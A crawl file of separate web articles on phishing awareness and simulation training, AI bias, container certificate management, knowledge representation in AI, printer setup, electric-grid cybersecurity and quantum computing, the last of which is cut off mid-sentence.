The Ultimate Guide To Understanding Phishing In 2022 So, what is phishing? Phishing is a form of social engineering that tricks people into revealing their passwords or valuable information. Phishing attacks can be in the form of emails, text messages, and phone calls. Usually, these attacks pose as popular services and companies that people recognize easily. When users click a phishing link in the body of an email, they are sent to a lookalike version of a site they trust. They are asked for their login credentials at this point in the phishing scam. Once they enter their information on the fake website, the attacker has what they need to access their real account. Phishing attacks can result in stolen personal information, financial information, or health information. Once the attacker gets access to one account, they either sell the access to the account or use that information to hack other accounts of the victim. Once the account is sold, someone who knows how to profit from the account will buy the account credentials from the dark web, and capitalize on the stolen data. Here is a visualization to help you understand the steps in a phishing attack: Phishing attacks come in different forms. Phishing can work from a phone call, text message, email, or social media message. Generic phishing emails are the most common type of phishing attack. Attacks like these are common because they take the least amount of effort. Hackers take a list of email addresses associated with Paypal or social media accounts and send a bulk email blast to the potential victims. When the victim clicks the link in the email, it often takes them to a fake version of a popular website and asks them to log in with their account info. As soon as they submit their account info, the hacker has what they need to access their account. In a sense, this type of phishing is like casting out a net into a school of fish; whereas other forms of phishing are more targeted efforts. Spear phishing is when an attacker targets a specific individual rather than sending a generic email to a group of people. Spear phishing attacks try to specifically address the target and disguise themselves as a person the victim may know. These attacks are easier for a scammer if you have personally identifiable information on the internet. The attacker is able to research you and your network to craft a message that is relevant and convincing. Due to the high amount of personalization, spear phishing attacks are much harder to identify compared to regular phishing attacks. They are also less common, because they take more time for criminals to pull them off successfully. Question: What’s the success rate of a spearphishing email? Answer: Spearphishing emails have an average email open-rate of 70% and 50% of recipients click a link in the email. Compared to spear phishing attacks, whaling attacks are drastically more targeted. Whaling attacks go after individuals in an organization such as the chief executive officer or chief financial officer of a company. One of the most common goals of whaling attacks is to manipulate the victim into wiring large sums of money to the attacker. Similar to regular phishing in that the attack is in the form of the email, whaling may use company logos and similar addresses to disguise themselves. In some instances, the attacker will impersonate the CEO and use that persona to convince another employee to reveal financial data or transfer money to the attackers account. Since employees are less likely to refuse a request from somebody higher up, these attacks are much more devious. Attackers will often spend more time crafting a whaling attack because they tend to pay off better. The name “whaling” refers to the fact that targets have more financial power (CEO’s). Angler phishing is a relatively new type of phishing attack and exists on social media. They do not follow the traditional email format of phishing attacks. Instead, they disguise themselves as customer service representatives of companies and trick people into sending them information through direct messages. A common scam is to send people to a fake customer support website that will download malware or in other words ransomware onto the victim’s device. A vishing attack is when a scammer calls you to attempt to gather personal information from you. Scammers usually pretend to be a reputable business or organization such as Microsoft, the IRS, or even your bank. They use fear-tactics to get you to reveal important account data. This allows them to directly or indirectly access your important accounts. Vishing attacks are tricky. Attackers can easily impersonate people that you trust. Watch Hailbytes Founder David McHale talk about how robocalls will vanish with future technology. Most phishing attacks occur through emails, but there are ways to identify their legitimacy. When you open up an email check to see whether or not its from a public email domain (ie. @gmail.com). If it is from a public email domain, it is most likely a phishing attack as organizations do not use public domains. Rather, their domains would be unique to their business (ie. Google’s email domain is @google.com). However, there are trickier phishing attacks that use a unique domain. It’s useful to do a quick search of the company and check its legitimacy. Phishing attacks always attempt to befriend you with a nice greeting or empathy. For example, in my spam not too long ago I found a phishing email with the greeting of “Dear friend”. I already knew this was a phishing email as in the subject line it said, “GOOD NEWS ABOUT YOUR FUNDS 21 /06/2020”. Seeing those types of greetings should be instant red flags if you have never interacted with that contact. The contents of a phishing email are very important, and you’ll see some distinctive features that make up most. If the contents sound absurd, then most likely it’s a scam. For example, if the subject line said, “You won the Lottery $1000000” and you have no recollection of participating then that’s a red flag. When the content creates a sense of urgency like “it depends on you” and it leads to clicking a suspicious link then it is most likely a scam. Phishing emails always have a suspicious link or file attached to them. A good way to check if a link has a virus is to use VirusTotal, a website that checks files or links for malware. Example Of Phishing Email: In the example, Google points out that the email can be potentially dangerous. It recognizes that its content matches with other similar phishing emails. If an email meets most of the criteria above, then it’s recommended to report it to [email protected] or [email protected] so that it gets blocked. If you are using Gmail there is an option to report the email for phishing. Even though phishing attacks are geared towards random users they often target employees of a company. However attackers are not always after a company’s money but its data. In terms of business, data is far more valuable than money and it can severely impact a company. Attackers can use leaked data to influence the public by impacting consumer trust and tarnishing the company name. But that’s not the only consequences that can result from that. Other consequences include negative impact on investor trust, disrupt business, and incite regulatory fines under the General Data Protection Regulation (GDPR). Training your employees to deal with this problem is recommended to reduce successful phishing attacks. Ways to train employees generally are to show them examples of phishing emails and the ways to spot them. Another good way to show employees phishing is through simulation. Phishing simulations are basically fake attacks designed to help employees recognize phishing firsthand without any negative effects. We will now share the steps you need to take to run a successful phishing campaign. Phishing remains to be the top security threat according to WIPRO’s state of cybersecurity report 2020. One of the best ways to collect data and educate employees is to run an internal phishing campaign. It can be easy enough to create a phishing email with a phishing platform, but there is a lot more to it than hitting send. We will discuss how to handle phishing tests with internal communications. Then, we will go over how you analyze and use the data that you collect. A phishing campaign isn’t about punishing people if they fall for a scam. A phishing simulation is about teaching employees how to respond to phishing emails. You want to make sure that you’re being transparent about doing phishing training in your company. Prioritize informing company leaders about your phishing campaign and describe the goals of the campaign. After you send your first baseline phishing email test, you can make a company-wide announcement to all employees. An important aspect of internal communications is to keep the message consistent. If you are doing your own phishing tests, then it’s a good idea to come up with a made up brand for your training material. Coming up with a name for your program will help employees recognize your educational content in their inbox. If you are using a managed phishing test service, then they will likely have this covered. Educational content should be produced ahead of time so that you can have an immediate follow-up after your campaign. Give your employees instructions and information about your internal phishing email protocol after your baseline test. You want to give your co-workers the opportunity to respond correctly to the training. Seeing the number of people that correctly spot and report the email is important information to gain from the phishing test. What should be your top priority for your campaign? You can try to base your results on the number of successes and failures, but those numbers don’t necessarily help you with your purpose. If you run a phishing test simulation and nobody clicks on the link, does that mean that your test was successful? The short answer is “no”. Having a 100% success rate doesn’t translate as a success. It can mean that your phishing test was simply too easy to spot. On the other hand, if you get a tremendous failure rate with your phishing test, it could mean something completely different. It could mean that your employees aren’t able to spot phishing attacks yet. When you get a high rate of clicks for your campaign, there is a good chance that you need to lower the difficulty of your phishing emails. Take more time to train people at their current level. You ultimately want to decrease the rate of phishing link clicks. You may be wondering what a good or bad click rate is with a phishing simulation. According to sans.org, your first phishing simulation may yield an average click rate of 25-30%. That seems like a really high number. Luckily, they reported that after 9-18 months of phishing training, the click rate for a phishing test was below 5%. These numbers can help as a rough estimate of your desired results from phishing training. To start your first phishing email simulation, make sure to whitelist the IP address of the testing tool. This makes sure that employees will receive the email. When crafting your first simulated phishing email don’t make it too easy or too hard. You should also remember your audience. If your coworkers are not heavy users of social media, then it probably wouldn’t be a good idea to use a fake LinkedIn password reset phishing email. The tester email has to have enough broad appeal that everyone in your company would have a reason to click. Some examples of phishing emails with broad appeal could be: Just remember the psychology of how the message will be taken by your audience before hitting send. Continue to send phishing training emails to your employees. Make sure that you are slowly increasing the difficulty over time to increase people’s skill levels. It’s recommended to do monthly email sends. If you “phish” your organization too often, they are likely to catch on a little too quickly. Catching your employees, a little bit off-guard is the best way to get more realistic results. If you send the same type of “phishing” emails every time, you’re not going to teach your employees how to react to different scams. You can try several different angles including: As you send new campaigns, always make sure that you are fine tuning the relevance of the message to your audience. If you send a phishing email that isn’t related to something of interest, you may not get much of a response from your campaign. After sending different campaigns to your employees, refresh some of the old campaigns that tricked people the first time and do a new spin on that campaign. You’ll be able to tell the effectiveness of your training if you see that people are either learning and improving. From there you will be able to tell if they need more education on how to spot a certain type of phishing email. There are 3 factors in determining whether you are going to create your own phishing training program or outsource the program. If you are a security engineer or have one in your company, you can easily spawn up a phishing server using a pre-existing phishing platform to create your campaigns. If you don’t have any security engineers, creating your own phishing program may be out of the question. You may have a security engineer in your organization, but they may not be experienced with social engineering or phishing tests. If you have someone that is experienced, then they would be reliable enough to create their own phishing program. This one is a really big factor for small to mid-sized companies. If your team is small, it might not be convenient to add another task to your security team. It is a lot more convenient to have another experienced team do the work for you. You’ve gone through this whole guide to figure out how you can train your employees and you’re ready to start protecting your organization through phishing training. If you are a security engineer and want to start running your first phishing campaigns now, go here to learn more about a phishing simulation tool that you can use to get started today. If you are interested in learning about managed services to run phishing campaigns for you, learn more right here about how you can start your free trial of phishing training. Use the checklist to identify unusual emails and if they are phishing then report them. Even though there are phishing filters out there that can protect you, it’s not 100%. Phishing emails are constantly evolving and are never the same. To protect your company from phishing attacks you can partake in phishing simulations to decrease chances of successful phishing attacks. We hope that you learned enough from this guide to figure out what you need to do next to decrease your chances of a phishing attack on your business. Please leave a comment if you have any questions for us or if you want to share any of your knowledge or experience with phishing campaigns. Don’t forget to share this guide and spread the word!
<urn:uuid:a13edee1-1004-4ecf-81a9-c3a34168d24d>
CC-MAIN-2022-40
https://hailbytes.com/the-ultimate-guide-to-understanding-phishing-in-2022/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.940584
3,261
3.390625
3
The link between artificial intelligence (AI) and bias is alarming. As AI evolves to become more human-like, it’s becoming clear that human bias is impacting technology in negative, potentially dangerous ways. Here, we explore how AI and bias are linked and what’s being done to reduce the impact of bias in AI applications: 3 questions on AI and bias 1. How does bias in AI impact automated decision systems? Using AI in decision-making processes has become commonplace, mostly because predictive analytics algorithms can perform the work of humans at a much faster and often more accurate rate. Decisions are being made by AI on small matters, like restaurant preferences, and critical issues, like determining which patient should receive an organ donation. While the stakes may differ, whether human bias is playing a role in AI decisions is sure to impact outcomes. Bad product recommendations impact retailer profit, and medical decisions can directly impact individual patient lives. Vincent C. Müller takes a look at AI and bias in his research paper, “Ethics of Artificial Intelligence and Robotics,” included in the Summer 2021 edition of “The Stanford Encyclopedia of Philosophy.” Fairness in policing is a primary concern, Müller says, noting that human bias exists in the data sets used by police to decide, for example, where to focus patrols or which prisoners are likely to re-offend. This kind of “predictive policing,” Müller says, relies heavily on data influenced by cognitive biases, especially confirmation bias, even when the bias is implicit and unknown to human programmers. Christina Pazzanese refers to the work of political philosopher Michael Sandel, a professor of government, in her article, “Great promise but potential for peril,” in The Harvard Gazette. “Part of the appeal of algorithmic decision-making is that it seems to offer an objective way of overcoming human subjectivity, bias, and prejudice,” Sandel says. “But we are discovering that many of the algorithms that decide who should get parole, for example, or who should be presented with employment opportunities or housing … replicate and embed the biases that already exist in our society.” 2. Why does bias exist in AI? To figure out how to remove or at least reduce bias in AI decision-making platforms, we have to consider why it exists in the first place. Take the AI chatbot training story in 2016. The chatbot was set up by Microsoft to hold conversations on Twitter, interacting with users through tweets and direct messaging. In other words, the general public had a large part in determining the chatbot’s “personality.” Within a few hours of its release, the chatbot was replying to users with offensive and racist messages, having been trained on anonymous public data, which was immediately co-opted by a group of people. The chatbot was heavily influenced in a conscious way, but it’s often not so clear-cut. In their joint article, “What Do We Do About the Biases in AI” in the Harvard Business Review, James Manyika, Jake Silberg, and Brittany Presten say that implicit human biases — those which people don’t realize they hold — can significantly impact AI. Bias can creep into algorithms in several ways, the article says. It can include biased human decisions or reflect “historical or social inequities, even if sensitive variables such as gender, race, or sexual orientation are removed.” As an example, the researchers point to Amazon, which stopped using a hiring algorithm after finding it favored applications based on words like “executed” or “captured,” which were more commonly included on men’s resumes. Flawed data sampling is another concern, the trio writes, when groups are overrepresented or underrepresented in the training data that teaches AI algorithms to make decisions. For example, facial analysis technologies analyzed by MIT researchers Joy Buolamwini and Timnit Gebru had higher error rates for minorities, especially minority women, potentially due to underrepresented training data. 3. How can we reduce bias in AI? In the McKinsey Global Institute article, “Tackling bias in artificial intelligence (and in humans),” Jake Silberg and James Manyika lay out six guidelines AI creators can follow to reduce bias in AI: - Be aware of the contexts in which AI can help correct for bias as well as where there is a high risk that AI could exacerbate bias - Establish processes and practices to test for and mitigate bias in AI systems - Engage in fact-based conversations about potential biases in human decisions - Fully explore how humans and machines can work best together - Invest more in bias research, make more data available for research, while respecting privacy, and adopt a multidisciplinary approach - Invest more in diversifying the AI field itself The researchers acknowledge that these guidelines won’t eliminate bias altogether, but when applied consistently, they have the potential to significantly improve on the situation.
<urn:uuid:25215c8b-ef01-4e55-adaa-4a7af1223b84>
CC-MAIN-2022-40
https://www.datamation.com/artificial-intelligence/bias-in-ai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.94859
1,056
3.640625
4
To meet the speed, reliability, and security requirements of the modern world, enterprise development teams must change their tools, methods, and application delivery practices. Gone are the long, drawn-out waterfall-based SDLCs that produce monolithic, hard-to-change applications. They have been replaced by new methods that rely on portable, scalable, lightweight, and reusable containers that package code, libraries, configuration files, and all other dependencies – enabling software to run reliably in multiple environments. By abstracting the underlying host infrastructure from the application platform, containers allow DevOps teams to easily compile applications to run in dev, prod, staging, or test environments – saving time and resources, and accelerating release cycles. To manage and orchestrate containers that are deployed across multiple machines, teams use Kubernetes – an open source engine that offers services for scheduling and deploying containers, and scaling them based on utilization. Docker is perhaps the most widely used tool for placing software into containers. A number of public repositories, such as Docker Hub, exist to facilitate the sharing of containers between teams. For authentication, Kubernetes requires PKI certificates – both to run the cluster (thus enabling communication between container functions) and to encrypt the traffic passing within the application that runs inside the container. (For details on which certificates are required by a cluster, click here.) If you use kubeadm – a tool for creating Kubernetes clusters, the required certificates are generated automatically. Security-conscious teams also have the option of generating their own certificates and configuring them for user accounts. Learn to manage certificates for short-lived container environments with full visibility and control. Security challenges in containerized environments Container security can get complicated, mostly because containers themselves are more complex than traditional deployment environments. Most organizations run multiple container images, with multiple instances of each image – inadvertently creating a single point of failure: when one container environment is compromised, all applications within each instance are at risk. While generating certificates, security teams often don’t follow standard practices – some certificates are acquired from public CAs, while others are generated in-house. This lack of uniformity can put the PKI infrastructure at risk, especially given the lack of communication between security engineers, developers, and other IT teams. What’s more, certificate renewals and application updates are not synchronized, creating potential security vulnerabilities. If application updates are typically released on a bi-weekly or monthly cycle, certificates are renewed annually – a disconnect which can result in serious problems for organizations. When legacy applications are no longer updated, but are still in use, security teams still need to remember to renew their certificates, which can be problematic – given that most organizations still store their certificates in spreadsheets or homegrown applications, without a consistent process for managing their inventory and monitoring for expiry dates. Organizations need an efficient and reliable mechanism for deploying certificates and keys for applications hosted in a container infrastructure. The solution? Automation. AppViewX CERT+ offers enterprise-grade certificate lifecycle automation The AppViewX CERT+ platform helps enterprises discover and manage certificates, and automate the entire lifecycle of their internal and external PKI in multi-cloud and containerized environments. Automated end-to-end Certificate Lifecycle Management (CLM) is quickly replacing manual processes through integration with a number of key native certificate management tools. Issuing certificates to cert-manager based on policy configured on AppViewX cert-manager is an OpenShift and Kubernetes certificate management controller tool. It acts as an ACME client and can be used for certificate enrollment and management functions. AppViewX CLM offers an ACME server implementation, which can issue certificates to the ACME client, based on enrollment requests from the client. Managing secrets and protecting sensitive data with HashiCorp Vault HashiCorp Vault secures and controls access to tokens, passwords, certificates, and keys for protecting sensitive data in a dynamic infrastructure. Vault applies a dynamic secret approach to public key certificates, acting as a signing intermediary to generate short-lived certificates. This allows certificates to be generated on-demand and rotated automatically. Organizations can set up their own internal root CA or intermediate CAs to sign certificates issued via Vault. It uses a PKI secret engine to store certificates, keys, and CSRs. AppViewX has configuration properties to act as a RA between the Vault (to route the certificate signing request calls) and the CA, using precise policy definitions. Container certificate requirements are managed in a more secure fashion, compared to hosting the CA internally. Certificate Management on ISTIO A service mesh is a dedicated infrastructure layer that helps control how parts of an application (services that perform different functions) interact and share information. It is designed to route requests for data between services to improve communication and optimize application performance. The best-known open source service mesh platform is Istio – it manages authentication, authorization, and encryption of service communication, allowing organizations to secure service-to-service communication at the network and application layers. Within Istio’s control panel is a certificate generation component, called Citadel. With Istio, there are two types of certificate requirements: – mTLS encryption & authentication – control and data plane object encryption – Encrypt the Ingress traffic – to access the application from outside. AppViewX offers an Istio-CERT+ plugin, which can be set up as a part of Istio mesh configuration on Kubernetes. – Istio-CERT is a modified Citadel plugin that is available as a control pane function – It functions using a modification to the call that istiod makes from the in-house CA, without affecting the way that a mesh requests certificates – AppViewX adds value by selecting the CA and policy through which the certificate needs to be issued When using an Istio mesh with the Istio-CERT+ plugin, all control pane and data plane functions get encrypted with AppViewX (Registration Authority) issued certificates, providing the mTLS encryption required to secure communication within the mesh. Each time a new application service gets spun off on a data plane, a new certificate requests from Istio agent on a service mesh is routed to the istiod function within the control pane. Istio-CERT recognizes this request and forwards it to AppViewX, which in turn issues a certificate to the proxy within the application mesh. The certificates are stored with the proxy (Envoy), where they can be read to access the application. AppViewX is also able to support the encryption of the Envoy proxy through Symmetric Key Encryption, or by providing a Vault within it. Implement best-of-breed PKI for your containerized environments with live guidance from our experts. As organizations of all types and sizes switch to component-based application delivery, they need to be mindful of potential security risks. The main advantages of the container infrastructure: scalability and ease of deployment, can become its greatest vulnerabilities if encrypted communication is not properly orchestrated and managed. Most vendors who offer certificate management solutions do not have the ability to support certificate lifecycles within containers. Increasingly, security-conscious enterprises are choosing AppViewX for its ability to provide certificate automation and orchestration capabilities through seamless integration with the tools and processes used by DevOps teams to deploy and run cloud-native, container-based applications.
<urn:uuid:10e9ecfb-29c3-4119-82a1-50bf9fa26b11>
CC-MAIN-2022-40
https://www.appviewx.com/blogs/managing-certificate-lifecycles-for-container-based-implementations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00252.warc.gz
en
0.919816
1,539
2.734375
3
Classifying Knowledge Representation In Artificial Intelligence Knowledge Representation Models in Artificial Intelligence Knowledge representation plays a crucial role in artificial intelligence. It has to do with the ‘thinking’ of AI systems and contributes to its intelligent behavior. Knowledge Representation is a radical and new approach in AI that is changing the world. Let’s look into what it is and its applications. Understanding Knowledge Representation and its Use Knowledge Representation is a field of artificial intelligence that is concerned with presenting real-world information in a form that the computer can ‘understand’ and use to ‘solve’ real-life problems or ‘handle’ real-life tasks. The ability of machines to think and act like humans such as understanding, interpreting and reasoning constitute knowledge representation. It is related to designing agents that can think and ensure that such thinking can constructively contribute to the agent’s behavior. In simple words, knowledge representation allows machines to behave like humans by empowering an AI machine to learn from available information, experience or experts. However, it is important to choose the right type of knowledge representation if you want to ensure business success with AI. Four Fundamental Types of Knowledge Representation In artificial intelligence, knowledge can be represented in various ways depending on the structure of the knowledge or the perspective of the designer or even the type of internal structure used. An effective knowledge representation should be rich enough to include the knowledge required to solve the problem. It should be natural, compact and maintainable. Related Reading: 6 Ways Artificial Intelligence Is Driving Decision Making Here are the four fundamental types of knowledge representation techniques: 1. Logical Representation Knowledge and logical reasoning play a huge role in artificial intelligence. However, you often require more than just general and powerful methods to ensure intelligent behavior. Formal logic is the most helpful tool in this area. It is a language with unambiguous representation guided by certain concrete rules. Knowledge representation relies heavily not so much on what logic is used but the method of logic used to understand or decode knowledge. It allows designers to lay down certain vital communication rules to give and acquire information from agents with minimum errors in communication. Different rules of logic allow you to represent different things resulting in an efficient inference. Hence, the knowledge acquired by logical agents will be definite which means it will either be true or false. Although working with logical representation is challenging, it forms the basis for programming languages and enables you to construct logical reasoning. 2. Semantic Network A semantic network allows you to store knowledge in the form of a graphic network with nodes and arcs representing objects and their relationships. It could represent physical objects or concepts or even situations. A semantic network is generally used to represent data or reveal structure. It is also used to support conceptual editing and navigation. A semantic network is simple and easy to implement and understand. It is more natural than logical representation. It allows you to categorize objects in various forms and then link those objects. It also has greater expressiveness than logic representation. Related Reading: Understanding The Different Types Of Artificial Intelligence 3. Frame Representation A frame is a collection of attributes and its associated values, which describes an entity in the real world. It is a record like structure consisting of slots and its values. Slots could be of varying sizes and types. These slots have names and values. Or they could have subfields named as facets. They allow you to put constraints on the frames. There is no restraint or limit on the value of facets a slot could have, or the number of facets a slot could have or the number of slots a frame could have. Since a single frame is not very useful, building a frame system by collecting frames that are connected to each other will be more beneficial. It is flexible and can be used by various AI applications. 4. Production Rules Production rule-based representation has many properties essential for knowledge representation. It consists of production rules, working memory, and recognize-act-cycle. It is also called condition-action rules. According to the current database, if the condition of a rule is true, the action associated with the rule is performed. Although production rules lack precise semantics for the rules and are not always efficient, the rules lead to a higher degree of modularity. And it is the most expressive knowledge representation system. Gain the Benefits of Knowledge Representation Used properly, knowledge representation enables artificial intelligence systems to function with near-human intelligence, even handling tasks that require a huge amount of knowledge. The increasing use of natural language also makes it human-like in its responses. Making the right choice in the type of knowledge representation you must incorporate is crucial and will ensure that you get the best out of your artificial intelligence system. If you need help with this, we’re here. Please reach out to us.
<urn:uuid:d009f9bd-4984-4a9e-ae48-b0f2a65f64e4>
CC-MAIN-2022-40
https://www.fingent.com/blog/classifying-knowledge-representation-in-artificial-intelligence/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00252.warc.gz
en
0.929778
997
3.03125
3
TCP/IP Printers are preferred to USB printers for several reasons. Not only are they shared more easily over a network, but they are not prone to the broken, intermittent and loose connections that plague USB devices. Before adding a TCP/IP printer to your computer, make sure that you have entered in to the printer’s GUI interface and set up a static IP address. Dynamic addresses will work if use the printers NetBIOS name to connect, but using a static IP address to print directly to a printer is more reliable. To begin, give your printer a static IP address (if it doesn’t have one already) and then open devices and printers and click on the add printer button. From the add printers dialog box, click ‘add local printer’. Click on the create new port radio button and select standard TCP/IP from the drop down menu. Enter the printer’s IP address in the host name or IP address field. If a driver is required, you will be prompted to enter the location containing the driver .inf files. When the driver is installed, give the printer a friendly name. Finally, choose sharing options. In a work environment, printers are usually shared only through print servers so DO NOT share your printer. Doing so will result in multiple instances of the same printer being shared across many PC’s on the network.
<urn:uuid:73a61fef-6a90-4810-8533-f801054e960a>
CC-MAIN-2022-40
https://www.falconitservices.com/how-to-add-a-tcp-ip-network-printer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00252.warc.gz
en
0.880532
287
2.640625
3
Smart Electric Grid Demands Smart Security by Anastasios Arampatzis Security of electric grid is a national security issue The electric grid delivers the electricity that is essential for modern life. The reliability of the grid and its ability to meet consumers’ demands at all times is of national interest. The grid’s reliability can be impaired by cyberattacks on the IT and OT systems that support its operations. Cyber-attacks could result in widespread loss of electrical services including long-duration, large-scale blackouts. High-profile attacks prove not only the severe impact of cyber-attacks against the electric grid, but also that the grid is a lucrative target for adversaries. -A group of hackers allegedly linked to Russia got into the system of a western Ukrainian power company in 2015, cutting power to 225,000 households. A US report into the blackout concluded that a virus was delivered via email through spear-phishing. -The 2016 cyberattack on Ukraine was the second in less than a year. Hackers left customers in parts of Kyiv without electricity for an hour, after disabling an electricity substation. The attack was attributed to Russian hackers, with some experts suggesting that the attack aimed to physically damage the power grid. -Saudi Aramco became the target of cyber-attacks in 2017 when hackers targeted the safety system in one of the company’s petrochemical plants. Experts believe that the attack aimed to not only to shut down the plant but to wipe out data and halt operations. -In March 2019, the US grid regulator NERC reportedly warned that a hacking group with suspected Russian ties was conducting reconnaissance into the networks of American electrical utilities. -The European Network of Transmission System Operators for Electricity (ENTSO-E) – which represents 42 European transmission system operators in 35 countries – said on 9 March 2020 it had recently “found evidence of a successful cyber intrusion into its office network”, and was introducing contingency plans to avoid further attacks. Power and energy are the core of almost everything we do. Nothing in our modern society can function without access to power, and it’s the utility industry that provides that to everybody, which is why this is an urgent matter of national concern, says former U.S. Homeland Security Secretary Michael Chertoff. The vulnerabilities of the energy sector are of particular concern to national security due to its enabling function across all critical infrastructure systems. According to Chertoff and many cybersecurity professionals, the security of the national electric grid is a “real national security issue.” In the European Union, the electric grid entities have been identified as operators of essential services under the Network and Information Systems Directive (NIS Directive). According to the requirements of the NIS Directive, electric gird companies are to have in place measures to prevent risks, ensure security of their network and handle and report incidents. In addition, the Electricity Risk Preparedness Regulation envisages the development of common methods to assess risks to the security of electricity supply, including risks of cyber-attacks; common rules for managing crisis situations and a common framework for better evaluation and monitoring of electricity supply security. Electric grid modernization efforts have increasingly bridged the gap between the physical, operational technology and information technology systems used to operate the grid. Previously, operational technology was largely isolated from information technology. But this separation has narrowed as grid operators incorporate new grid management systems and utilities install millions of smart meters and other internet-enabled devices on the grid. While these advanced technologies offer significant improvements in grid operations and real-time system awareness, they also increase the number of points on the grid that malicious actors can target to gain access and compromise larger systems. A recent report by the U.S. Government Accountability Office (GAO) notes that the electric grid faces “significant cybersecurity risks” because “threat actors are becoming increasingly capable of carrying out attacks on the grid.” At the same time, “the grid is becoming more vulnerable to cyberattacks” via: - Industrial Control Systems. The integration of cheaper and more widely available devices that use traditional networking protocols into industrial control systems has led to a larger cyberattack surface for the grid’s systems. - Consumer Internet of Things (IoT) devices connected to the grid’s distribution network. Malicious threat actors could compromise many high-wattage IoT devices (such as air conditioners and heaters) and turn them into a botnet. The malicious actors could then use the botnet to launch a coordinated attack aimed at manipulating the demand across distribution grids. - The Global Positioning System (GPS) The grid is dependent on GPS timing to monitor and control generation, transmission, and distribution functions. Although there is a comprehensive overall legal framework for cybersecurity, the energy sector presents certain particularities that require particular attention: - Real-time requirements Some systems need to react so fast that standard security measures such as authentication of a command or verification of a digital signature can simply not be introduced due to the delay these measures impose. - Cascading effects Electricity grids are strongly interconnected across many countries. An outage in one country might trigger blackouts or shortages of supply in other areas and countries. - Combined legacy systems with new technologies Many elements of the energy system were designed and built well before cybersecurity considerations came into play. This legacy now needs to interact with the most recent state-of-the-art equipment for automation and control, such as smart meters or connected appliances, and IoT devices without being exposed to cyber-threats. In addition to the above considerations, the European Parliament has identified trends that highlight the importance for strong cyber-physical security measures and policies in the electricity sector, including: - Digitalization and automation The move towards a smart grid with more and more networked grid components, from electricity generators to transmission and distribution networks to smart meters in the home affects the security of the gird. All these devices present potential opportunities for attacks or inadvertent disruption. - Sustainable energy With the objective of achieving a climate-neutral energy system, the electricity system will be increasingly decentralized (distributed wind, solar and hydropower installations) and interconnected. In addition, electric vehicles, smart appliances, and flexible industrial demand lead to a dramatic increase of potentially vulnerable networked devices on the electricity grid. - Market reform Reforms of the electricity market allow new actors to participate. This includes energy companies, aggregators, and individual citizens. Many of these do not have adequate cybersecurity skills and need to rely on certified equipment, software and service providers. - Capabilities of adversaries Cyber criminals’ skills are constantly evolving and becoming more sophisticated. Automated attack tools have the potential to spread in the network and cause damage beyond the intended target. Artificial intelligence has the potential to boost the capabilities of attackers, as well as the defenders, and can prove to be a critical advantage. - Skills gap With the increasing need for cybersecurity skills, the current shortage of skilled personnel is likely to persist. Information and knowledge sharing will be vital in making the best use of the available skills base. How to address the cybersecurity risks The diverse nature of electric grid entities, the impact of potential cyber-attacks against the grid and the many challenges dictate the need for a holistic, smart approach to measures to prevent and protect from adversaries. In the European Union, the Smart Grids Task Force has released in June 2019 their final report for the “Implementation of Sector-Specific Rules for Cybersecurity.” The report recommends the compliance of responsible entities with two international standards: - ISO/IEC 27001:2013 - ISA/IEC 62433 series Electric grid responsible entities in Europe should also have a look at the NERC CIP standards. The North American Electric Reliability Consortium (NERC) Critical Infrastructure Protection (CIP) framework has been recognized by the European Parliament as “the most detailed and comprehensive cybersecurity standards in the world” which is flexible enough to evolve when necessary, adjusting effectively to the fluctuating cybersecurity environment. A 2018 report from the EU Center of Energy states that: “The United States has favored a strategy of ‘security in depth’ with strict and detailed regulations in specific sectors, which are implemented by institutions possessing coercive powers. The American system can serve as a model to improve certain weaknesses in the European approach.” Both frameworks have the same overarching principles: a risk-based approach, having deep understanding of the threat environment and the assets to be protected. Having visibility into your business environment is the foundation on which all cybersecurity measures can be built. Based on the classification of risks and assets, electric grid entities can then select the appropriate controls – network segmentation, access controls, physical security – to mitigate the imminent threats and minimize the impact of potential adversarial actions. How ADACOM can help The electricity sector has a specific threat profile, that is a mix of threats and risks related to the business needs of the sector, as well as the relation to safety issues, and the entanglement of ICT & Operational Technology. Electric grid entities, no matter their size, should follow a holistic approach towards the protection of their assets and critical infrastructure. To do so, ADACOM propose the adoption of the following: - Holistic approach to Security Risk Management (addressing all applicable digital, physical, hybrid risks) - Risk mitigation based of processes and technology tailored to the Oil and Gas sector - Adoption of a continuous risk and effective assessment process - Usage of cryptographic keys on smart grids for authentication and encryption - Development and enforcement of an Information Security Management Systems, based on the concepts of information resilience & SA/IEC 62433 series - Awareness tailored to the needs of the sector ADACOM can help electricity and energy organizations to safeguard their grid and all of their critical assets and be resilient against cyber incidents, through a comprehensive risk management program, in order to effectively adopt cyber security technology (inclunding IOT Certificates) and processes . You may learn more by contacting our experts.
<urn:uuid:35562e94-4a55-41ba-af69-0c4f4e2b61ad>
CC-MAIN-2022-40
https://www.adacom.com/news/press-releases/smart-electric-grid-demands-smart-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00252.warc.gz
en
0.939752
2,072
2.703125
3
A team of physicists at Rice University have created an “electron superhighway” that could one day be useful for building a quantum computer — a machine that would utilize quantum particles instead of the digital transistors in today’s microchips. Rui-Rui Du, a professor of physics and astronomy, and graduate student Ivan Knez describe the new method for making the device, known as “quantum spin Hall topological insulator,” in a paper published in Physical Review Letters, journal of the American Physical Society. The device acts as an electron superhighway — one of the building blocks necessary to create quantum particles that can store and manipulate data. A quantum computer would be unlike traditional silicon-based computers that use binary codes of ones and zeros. Quantum computing is based on “superpositions” and qubits that would allow a computer to store information as both zero and one at the same time. The struggle now is to make qubits more reliable, as information becomes lost over time due to quantum fluctuations, a phenomenon known as “fault tolerance.” The new “superhighway” technology will allow intense computing tasks like code-breaking, climate modeling and biomedical simulations to be carried out thousands of times faster, the Rice physicists explained. “In principle, we don’t need many qubits to create a powerful computer. In terms of information density, a silicon microprocessor with one billion transistors would be roughly equal to a quantum processor with 30 qubits,” said Du. Raw but Real Early stages of research can be inspiring as well as frustrating. “I’m biased towards any scientific discovery, so my first reaction is ‘cool,'” Steven Savage, technology project 